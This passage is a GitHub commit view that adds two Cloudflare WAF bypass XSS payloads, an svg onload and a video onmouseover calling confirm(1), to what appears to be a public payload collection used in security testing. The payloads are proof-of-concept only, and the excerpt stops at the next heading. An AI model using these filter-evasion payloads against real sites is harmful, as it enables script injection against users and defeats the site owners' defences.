Merge pull request #395 from daffainfo/patch-1

Adding Cloudflare XSS payload
This commit is contained in:
Swissky 2021-08-25 22:21:54 +02:00 committed by GitHub
commit 1e85308ae2
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -1082,6 +1082,13 @@ Works for CSP like `script-src 'self' data:`
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
#### 25st January 2021
```html
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
```
#### 21st April 2020
```html